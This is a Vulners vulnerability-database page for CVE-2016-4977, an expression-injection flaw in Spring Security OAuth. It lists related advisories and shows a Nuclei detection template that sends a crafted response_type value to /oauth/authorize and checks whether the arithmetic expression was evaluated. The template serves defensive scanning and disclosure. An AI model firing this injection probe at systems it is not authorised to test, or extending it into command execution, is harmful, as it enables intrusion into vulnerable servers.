Vulners
Lucene search
Spring Security OAuth2 Remote Command Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2016-4977 | 20 Jun 202201:10 | – | circl |
 | Spring Security OAuth Remote Command Execution Vulnerability | 27 Aug 201600:00 | – | cnvd |
 | Pivotal Spring Security OAuth SpelView Code Execution (CVE-2016-4977) | 20 Nov 201600:00 | – | checkpoint_advisories |
 | CVE-2016-4977 | 25 May 201717:00 | – | cve |
 | CVE-2016-4977 | 25 May 201717:00 | – | cvelist |
 | Spring Security OAuth vulnerable to remote code execution (RCE) via specially crafted request using whitelabel views | 18 Oct 201818:06 | – | github |
 | CVE-2 0 1 6-4 9 7 7: RCE in Spring Security Oauth vulnerability analysis-vulnerability warning-the black bar safety net | 19 Oct 201600:00 | – | myhack58 |
 | CVE-2016-4977 | 25 May 201717:29 | – | nvd |
 | CVE-2016-4977 | 25 May 201717:29 | – | osv |
| GHSA-7Q9C-H23X-65FQ Spring Security OAuth vulnerable to remote code execution (RCE) via specially crafted request using whitelabel views | 18 Oct 201818:06 | – | osv |
10
id: CVE-2016-4977
info:
name: Spring Security OAuth2 Remote Command Execution
author: princechaddha
severity: high
description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://tanzu.vmware.com/security/cve-2016-4977
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
- https://pivotal.io/security/cve-2016-4977
- http://www.openwall.com/lists/oss-security/2019/10/16/1
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-4977
cwe-id: CWE-19
epss-score: 0.79176
epss-percentile: 0.9955
cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: pivotal
product: spring_security_oauth
tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Unsupported response types: [978015547]"
- type: status
status:
- 400
# digest: 490a0046304402205d3cf91aeaabe7613c3e5f00f41505bdeb9953afab4c44802cfed3249b81184a02203668c6110e01129975aa611e29872d15537ca6612167efc8473484021e93aedf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.5
CVSS 38.8
EPSS0.79176